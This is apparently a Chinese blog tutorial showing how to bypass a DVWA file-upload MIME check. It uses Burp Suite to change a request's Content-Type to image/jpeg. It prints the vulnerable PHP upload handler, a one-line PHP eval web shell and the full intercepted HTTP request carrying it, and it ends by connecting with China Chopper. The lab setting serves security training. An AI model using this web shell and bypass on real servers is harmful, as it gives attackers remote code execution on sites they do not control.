文件上传漏洞MIME类型绕过,文件上传漏洞content-type类型绕过
(1).目标站的文件上传验证文件的MIME类型必须为image/jpeg,示例代码:
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_type = $_FILES['uploaded']['type'];
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)) {
if (!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
} else {
echo '<pre>Your image was not uploaded.</pre>';
}
}(2).开启kali中的工具Burp Suite开启其中的代理拦截修改功能,开启的代理为192.168.147.132 8080
(3).本机电脑浏览器不设置代理在文件上传页选择木马文件muma.php
<?php @eval($_POST['pass']);?>
(4).本机电脑浏览器设置代理为上面Burp Suite的代理,记得Burp Suite要开启代理拦截,然后点击上传,此时打开Burp Suite软件看到拦截信息的raw内容如下:
POST /dvwa/vulnerabilities/upload/ HTTP/1.1 Host: 192.168.147.131 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------68278927234299128771152654658 Content-Length: 507 Origin: http://192.168.147.131 Connection: close Referer: http://192.168.147.131/dvwa/vulnerabilities/upload/ Cookie: security=low; security=medium; PHPSESSID=vl1eiur1jcp2kadhjun9tjogq7 Upgrade-Insecure-Requests: 1 -----------------------------68278927234299128771152654658 Content-Disposition: form-data; name="MAX_FILE_SIZE" 100000 -----------------------------68278927234299128771152654658 Content-Disposition: form-data; name="uploaded"; filename="muma.php" Content-Type: application/octet-stream <?php @eval($_POST['pass']);?> -----------------------------68278927234299128771152654658 Content-Disposition: form-data; name="Upload" Upload -----------------------------68278927234299128771152654658--
我们将raw中Content-Type: application/octet-stream改为Content-Type: image/jpeg,点击forward正式发送出去,此时浏览器显示上传成功.中国菜刀测试一键连接。
记得此处的Content-Type是和浏览器中直接看到的是不同的。这算是OWASP Broken Web Applications Project项目中典型的例子。
“文件上传漏洞MIME类型绕过,文件上传漏洞content-type类型绕过” 的相关文章
c#中string和StringBuilder效率对比
c#中string和StringBuilder直接看看执行速度。(2).String类型累计赋值Test ...
Application的错误使用
Application 对象用于存储和访问来自任意页面的变量,类似 Session 对象。不同之处在于所有的用户分享一个 Application 对象,而 session 对象和用户的关系是一一对应的。很多的书籍中介绍的Application对象都喜欢以统计在线人数来介绍Application 对象...
Git从远程仓库更新文件
git pull https://git.oschina.net/392223903/learn.git master 换为您的git地址...
C# md5加密,C# md5加密代码
public static string GetMD5(string str) { //创建MD5对象 MD5 md5 = MD5.C...
redis安装教程
1.文件redis-2.6.14.tar.gz的上传 /home/john/创建rdtar文件夹 上传redis-2.6.14.tar.gz至rdtar文件夹 2.解压文件 cd /home/john/rdtar tar &n...
nginx配置https,nginx ssl配置
首先在阿里云申请免费的证书,选择自动生成证书。然后就是nginx虚拟主机配置文件的修改。以下是我的配置文件(因为公司开发小程序,没有办法只能使用https)。您只需要关注带有ssl的配置选项,我增加了一个监听80和443的端口,同时增加了http跳转https的配置server &nbs...